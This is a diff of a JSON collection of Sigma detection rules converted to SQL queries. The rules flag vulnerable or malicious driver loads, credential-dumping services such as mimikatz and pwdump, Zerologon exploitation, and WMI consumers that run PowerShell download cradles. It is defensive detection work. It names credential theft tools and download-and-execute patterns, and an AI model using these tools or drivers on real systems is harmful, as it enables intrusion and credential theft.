'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '89b0017bc30cc026e32b758c66a1af88bd54c6a78e11ec2908ff854e00ac46be', 'e005e8d183e853a27ad3bb56f25489f369c11b0d47e3d4095aad9291b3343bf1', '5f5e5f1c93d961985624768b7c676d488c7c7c1d4c043f6fc1ea1904fefb75be', 'cdd2a4575a46bada4837a6153a79c14d60ee3129830717ef09e0e3efd9d00812', 'ac3f613d457fc4d44fa27b2e0b1baa62c09415705efb5a40a4756da39b3ac165', '475e5016c9c0f5a127896f9179a1b1577a67b357f399ab5a1e68aab07134729a', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '0de4247e72d378713bcf22d5c5d3874d079203bb4364e25f67a90d5570bdcce8', '72b99147839bcfb062d29014ec09fe20a8f261748b5925b00171ef3cb849a4c1', 
'cc586254e9e89e88334adee44e332166119307e79c2f18f6c2ab90ce8ba7fc9b', 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe', '5ee292b605cd3751a24e5949aae615d472a3c72688632c3040dc311055b75a92', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', 'f8886a9c759e0426e08d55e410b02c5b05af3c287b15970175e4874316ffaf13', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', '2da330a2088409efc351118445a824f11edbe51cf3d653b298053785097fe40e', '54841d9f89e195196e65aa881834804fe3678f1cf6b328cab8703edd15e3ec57', 'e6a7b0bc01a627a7d0ffb07faddb3a4dd96b6f5208ac26107bdaeb3ab1ec8217', 'cf4b5fa853ce809f1924df3a3ae3c4e191878c4ea5248d8785dc7e51807a512b', '6839fcae985774427c65fe38e773aa96ec451a412caa5354ad9e2b9b54ffe6c1', '708016fbe22c813a251098f8f992b177b476bd1bbc48c2ed4a122ff74910a965', '362c4f3dadc9c393682664a139d65d80e32caa2a97b6e0361dfd713a73267ecc', '08eb2d2aa25c5f0af4e72a7e0126735536f6c2c05e9c7437282171afe5e322c6', '2d83ccb1ad9839c9f5b3f10b1f856177df1594c66cbbc7661677d4b462ebf44d', 'c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c', '4941c4298f4560fc1e59d0f16f84bab5c060793700b82be2fd7c63735f1657a8', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', '76fb4deaee57ef30e56c382c92abffe2cf616d08dbecb3368c8ee6b02e59f303', '3a5ec83fe670e5e23aef3afa0a7241053f5b6be5e6ca01766d6b5f9177183c25', '7196187fb1ef8d108b380d37b2af8efdeb3ca1f6eefd37b5dc114c609147216d', 'f461414a2596555cece5cfee65a3c22648db0082ca211f6238af8230e41b3212', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', 'b9dad0131c51e2645e761b74a71ebad2bf175645fa9f42a4ab0e6921b83306e3', 'fd223833abffa9cd6cc1848d77599673643585925a7ee51259d67c44d361cce8', 'd5586dc1e61796a9ae5e5d1ced397874753056c3df2eb963a8916287e1929a71', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', '6cb51ae871fbd5d07c5aad6ff8eea43d34063089528603ca9ceb8b4f52f68ddc', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', 
'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '4a3d4db86f580b1680d6454baee1c1a139e2dde7d55e972ba7c92ec3f555dce2', 'dec8a933dba04463ed9bb7d53338ff87f2c23cfb79e0e988449fc631252c9dcc', '6b5cf41512255237064e9274ca8f8a3fef820c45aa6067c9c6a0e6f5751a0421', 'e83908eba2501a00ef9e74e7d1c8b4ff1279f1cd6051707fd51824f87e4378fa', '0ebaef662b14410c198395b13347e1d175334ec67919709ad37d65eba013adff', '3e9b62d2ea2be50a2da670746c4dbe807db9601980af3a1014bcd72d0248d84c', '7d8937c18d6e11a0952e53970a0934cf0e65515637ac24d6ca52ccf4b93d385f', '9d58f640c7295952b71bdcb456cae37213baccdcd3032c1e3aeb54e79081f395', 'aa9ab1195dc866270e984f1bed5e1358d6ef24c515dfdb6c2a92d1e1b94bf608', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'ea0b9eecf4ad5ec8c14aec13de7d661e7615018b1a3c65464bf5eca9bbf6ded3', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '258359a7fa3d975620c9810dab3a6493972876a024135feaf3ac8482179b2e79', '146d77e80ca70ea5cb17bfc9a5cea92334f809cbdc87a51c2d10b8579a4b9c88', '9790a7b9d624b2b18768bb655dda4a05a9929633cef0b1521e79e40d7de0a05b', 'cb9890d4e303a4c03095d7bc176c42dee1b47d8aa58e2f442ec1514c8f9e3cec', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', '436ccab6f62fa2d29827916e054ade7acae485b3de1d3e5c6c62d3debf1480e7', 'b9a4e40a5d80fedd1037eaed958f9f9efed41eb01ada73d51b5dcd86e27e0cbf', 'b4d47ea790920a4531e3df5a4b4b0721b7fea6b49a35679f0652f1e590422602', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '81939e5c12bd627ff268e9887d6fb57e95e6049f28921f3437898757e7f21469', '4ab41816abbf14d59e75b7fad49e2cb1c1feb27a3cb27402297a2a4793ff9da7', 'af095de15a16255ca1b2c27dad365dff9ac32d2a75e8e288f5a1307680781685', 'b7a20b5f15e1871b392782c46ebcc897929443d82073ee4dcb3874b6a5976b5d', 'ea85bbe63d6f66f7efee7007e770af820d57f914c7f179c5fee3ef2845f19c41', 
'06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4', '4e3eb5b9bce2fd9f6878ae36288211f0997f6149aa8c290ed91228ba4cdfae80', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', '4a9093e8dbcb867e1b97a0a67ce99a8511900658f5201c34ffb8035881f2dbbe', '38fa0c663c8689048726666f1c5e019feaa9da8278f1df6ff62da33961891d2a', '56a3c9ac137d862a85b4004f043d46542a1b61c6acb438098a9640469e2d80e7', '455bc98ba32adab8b47d2d89bdbadca4910f91c182ab2fc3211ba07d3784537b', 'e86cb77de7b6a8025f9a546f6c45d135f471e664963cf70b381bee2dfd0fdef4', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', 'b1d96233235a62dbb21b8dbe2d1ae333199669f67664b107bff1ad49b41d9414', 'dfaefd06b680f9ea837e7815fc1cc7d1f4cc375641ac850667ab20739f46ad22', '221dfbc74bbb255b0879360ccc71a74b756b2e0f16e9386b38a9ce9d4e2e34f9', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', '78827fa00ea48d96ac9af8d1c1e317d02ce11793e7f7f6e4c7aac7b5d7dd490f', '7f190f6e5ab0edafd63391506c2360230af4c2d56c45fc8996a168a1fc12d457', 'd5562fb90b0b3deb633ab335bcbd82ce10953466a428b3f27cb5b226b453eaf3', 'fd33fb2735cc5ef466a54807d3436622407287e325276fcd3ed1290c98bd0533', 'f581decc2888ef27ee1ea85ea23bbb5fb2fe6a554266ff5a1476acd1d29d53af', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', 'dde6f28b3f7f2abbee59d4864435108791631e9cb4cdfb1f178e5aa9859956d8', '21ccdd306b5183c00ecfd0475b3152e7d94b921e858e59b68a03e925d1715f21', '91314768da140999e682d2a290d48b78bb25a35525ea12c1b1f9634d14602b2c', '98b734dda78c16ebcaa4afeb31007926542b63b2f163b2f733fa0d00dbb344d8', 'd25904fbf907e19f366d54962ff543d9f53b8fdfd2416c8b9796b6a8dd430e26', '6f1ff29e2e710f6d064dc74e8e011331d807c32cc2a622cbe507fd4b4d43f8f4', '3326e2d32bbabd69feb6024809afc56c7e39241ebe70a53728c77e80995422a5', '8cb62c5d41148de416014f80bd1fd033fd4d2bd504cb05b90eeb6992a382d58f', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', 
'50db5480d0392a7dd6ab5df98389dc24d1ed1e9c98c9c35964b19dabcd6dc67f', '3ec5ad51e6879464dfbccb9f4ed76c6325056a42548d5994ba869da9c4c039a8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', 'b47be212352d407d0ef7458a7161c66b47c2aec8391dd101df11e65728337a6a', '3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'a961f5939088238d76757669a9a81905e33f247c9c635b908daac146ae063499', '509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', '09bedbf7a41e0f8dabe4f41d331db58373ce15b2e9204540873a1884f38bdde1', '1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', '823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba', '05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', 'e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463', '9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b'))" ], - "filename": "win_system_invoke_obfuscation_via_var_services.yml" + "filename": "driver_load_win_vuln_drivers.yml" }, { - "title": "Vulnerable Netlogon Secure Channel Connection Allowed", - "id": "a0cb7110-edf0-47a4-9177-541a4083128a", - "status": "test", - "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", - "author": "NVISO", + "title": "Vulnerable HW Driver Load", + "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "status": "experimental", + "description": "Detects the 
load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8'))" ], - "filename": "win_system_vul_cve_2020_1472.yml" + "filename": "driver_load_win_vuln_hw_driver.yml" }, { - "title": "DHCP Server Loaded the CallOut DLL", - "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", + "title": "Suspicious Driver Load from Temp", + "id": 
"2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", "status": "test", - "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", - "author": "Dimitrios Slamaris", + "description": "Detects a driver load from a temporary directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "There is a relevant set of false positives depending on applications in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\'" ], - "filename": "win_system_susp_dhcp_config.yml" + "filename": "driver_load_win_susp_temp_use.yml" }, { - "title": "Moriya Rootkit - System", - "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "title": "Vulnerable Dell BIOS Update Driver Load", + "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", "status": "experimental", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", - "tags": [ - "attack.persistence", + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", + "author": "Florian Roth (Nextron Systems)", + "tags": [ "attack.privilege_escalation", - "attack.t1543.003" + "cve.2021.21551", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Unknown" + "Legitimate BIOS driver updates (should be rare)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE 
'%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244'))" ], - "filename": "win_system_moriya_rootkit.yml" + "filename": "driver_load_win_vuln_dell_driver.yml" }, { - "title": "Turla Service Install", - "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "title": "PowerShell Scripts Run by a Services", + "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", "status": "test", - "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\')" ], - "filename": "win_system_apt_carbonpaper_turla.yml" + "filename": 
"driver_load_win_powershell_script_installed_as_service.yml" }, { - "title": "Credential Dumping Tools Service Execution - System", - "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "title": "Usage Of Malicious POORTRY Signed Driver", + "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", "status": "experimental", + "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1543", + "attack.t1068" + ], + "falsepositives": [ + "Legitimate BIOS driver updates (should be rare)" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR 
Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a'))" + ], + "filename": "driver_load_win_mal_poortry_driver.yml" + }, + { + "title": "Credential Dumping Tools Service Execution", + "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "status": "test", "description": "Detects well-known credential dumping tools execution via service execution events", "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ 
@@ -2647,214 +2613,196 @@ "falsepositives": [ "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" - ], - "filename": "win_system_mal_creddumper.yml" - }, - { - "title": "Zerologon Exploitation Using Well-known Tools", - "id": "18f37338-b9bd-4117-a039-280c81f7a596", - "status": "stable", - "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", - "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", - "tags": [ - "attack.t1210", - "attack.lateral_movement" - ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\')" ], - "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + "filename": "driver_load_win_mal_creddumper.yml" }, { - "title": "New Service Uses Double Ampersand in Path", - "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "title": "Vulnerable WinRing0 Driver Load", + "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", "status": "experimental", - "description": 
"Detects a service installation that uses a suspicious double ampersand used in the image path value", + "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7')" ], - "filename": "win_system_service_install_susp_double_ampersand.yml" + "filename": "driver_load_win_vuln_winring0_driver.yml" }, { - "title": "Service Installed By Unusual Client - System", - "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "title": "Vulnerable GIGABYTE Driver Load", + "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = 
'0')" + "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b'))" ], - "filename": "win_system_system_service_installation_by_unusal_client.yml" + "filename": "driver_load_win_vuln_gigabyte_driver.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher - System", - "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "title": "Suspicious Scripting in a WMI Consumer", + "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "status": "experimental", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059.005" ], "falsepositives": [ - "Unknown" + "Legitimate administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' 
OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\'))" ], - "filename": 